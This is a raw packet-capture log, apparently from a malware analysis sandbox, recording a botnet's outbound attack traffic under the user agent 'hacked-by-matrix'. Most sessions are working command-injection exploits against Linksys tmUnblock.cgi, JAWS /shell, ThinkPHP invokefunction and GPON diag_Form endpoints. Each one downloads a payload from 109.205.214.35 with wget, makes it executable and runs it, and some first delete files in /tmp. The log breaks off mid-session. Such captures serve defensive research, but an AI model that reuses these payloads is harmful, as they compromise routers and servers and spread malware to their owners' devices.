50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>501 Not Implemented</title></head><body><h1>Not Implemented</h1><p>3&amp;remoteSubmit=Save to /index.html not supported.<br /></p><hr><address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        706192.168.2.1354718172.65.76.20055555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:52.039457083 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        707192.168.2.1334996172.65.205.16955555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:52.127790928 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        708192.168.2.134057871.19.249.3980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:52.335800886 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:52.498369932 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:10:14 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        709192.168.2.1349386172.65.255.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:52.487317085 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        710192.168.2.1335980206.189.30.15080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:52.494107962 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:52.657780886 CET190INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        711192.168.2.134934487.110.31.5180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:52.699800014 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:53.250129938 CET301INHTTP/1.1 200 OK
                                                        Content-Type:text/html
                                                        Pragma:no-cache
                                                        Cache-control:no-cache, no-store, max-age=0
                                                        Transfer-Encoding:chunked
                                                        X-Frame-Options:SAMEORIGIN
                                                        Connection:Keep-Alive
                                                        X-XSS-Protection:1; mode=block
                                                        Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        Mar 21, 2024 05:22:53.250344992 CET1286INData Raw: 63 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                        Data Ascii: c1e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8
                                                        Mar 21, 2024 05:22:53.250633001 CET1286INData Raw: 69 20 3c 20 4c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 66 61 6c 73 65 20 3d 3d 20 49 73 49 50 76 36 41 64 64 72 65 73 73 55 73 68 6f 72 74 56 61 6c 69 64 28 4c 69 73 74 5b 69 5d 29
                                                        Data Ascii: i < List.length; i++) { if (false == IsIPv6AddressUshortValid(List[i])) { return false; } } return true; }function IsIPv6AddressValid(Address){ if (Address == "::") {
                                                        Mar 21, 2024 05:22:53.250669956 CET578INData Raw: 7d 0a 65 6c 73 65 0a 7b 0a 76 61 72 20 6e 65 77 69 70 76 36 61 64 64 72 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 75 62 73 74 72 28 30 2c 6c 61 73 74 69 6e 64 65 78 29 3b 0a 76 61 72 20 6e 65 77 69 70 76 36 70 6f 72 74 20 3d 20 48 6f 73 74 49 6e 66
                                                        Data Ascii: }else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWan == 0){window.location="https://[" + newipv6addr + "]:" + SSLPort;}else{window.location="https://[" + newipv6addr + "]


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        712192.168.2.13504022.17.147.12780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.343483925 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:53.522574902 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:22:53 GMT
                                                        Date: Thu, 21 Mar 2024 04:22:53 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 37 66 39 33 31 31 30 32 26 23 34 36 3b 31 37 31 30 39 39 34 39 37 33 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;7f931102&#46;1710994973&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        713192.168.2.134935887.110.31.5180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.539350033 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:53.742377996 CET301INHTTP/1.1 200 OK
                                                        Content-Type:text/html
                                                        Pragma:no-cache
                                                        Cache-control:no-cache, no-store, max-age=0
                                                        Transfer-Encoding:chunked
                                                        X-Frame-Options:SAMEORIGIN
                                                        Connection:Keep-Alive
                                                        X-XSS-Protection:1; mode=block
                                                        Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        Mar 21, 2024 05:22:53.742480993 CET1286INData Raw: 63 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                        Data Ascii: c1e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8
                                                        Mar 21, 2024 05:22:53.742547989 CET1286INData Raw: 69 20 3c 20 4c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 66 61 6c 73 65 20 3d 3d 20 49 73 49 50 76 36 41 64 64 72 65 73 73 55 73 68 6f 72 74 56 61 6c 69 64 28 4c 69 73 74 5b 69 5d 29
                                                        Data Ascii: i < List.length; i++) { if (false == IsIPv6AddressUshortValid(List[i])) { return false; } } return true; }function IsIPv6AddressValid(Address){ if (Address == "::") {
                                                        Mar 21, 2024 05:22:53.742559910 CET578INData Raw: 7d 0a 65 6c 73 65 0a 7b 0a 76 61 72 20 6e 65 77 69 70 76 36 61 64 64 72 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 75 62 73 74 72 28 30 2c 6c 61 73 74 69 6e 64 65 78 29 3b 0a 76 61 72 20 6e 65 77 69 70 76 36 70 6f 72 74 20 3d 20 48 6f 73 74 49 6e 66
                                                        Data Ascii: }else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWan == 0){window.location="https://[" + newipv6addr + "]:" + SSLPort;}else{window.location="https://[" + newipv6addr + "]


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        714192.168.2.134324895.86.89.5780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.542212963 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:57.708342075 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        715192.168.2.134921895.56.132.21180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.591361046 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:54.989999056 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:55.250916004 CET317INHTTP/1.1 400 Bad Request
                                                        Server: Web server
                                                        Date: Thu, 21 Mar 2024 04:22:52 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        716192.168.2.1343502172.65.13.1768080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.607460976 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        717192.168.2.1353426118.172.70.210443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631213903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        718192.168.2.13602965.190.222.237443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631241083 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        719192.168.2.133307842.6.70.92443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631263018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        720192.168.2.133360442.218.156.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631263971 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        721192.168.2.13496425.136.47.217443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631264925 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        722192.168.2.13400845.182.75.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631279945 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        723192.168.2.1359662109.155.104.236443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631298065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        724192.168.2.1340584212.237.121.252443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631331921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
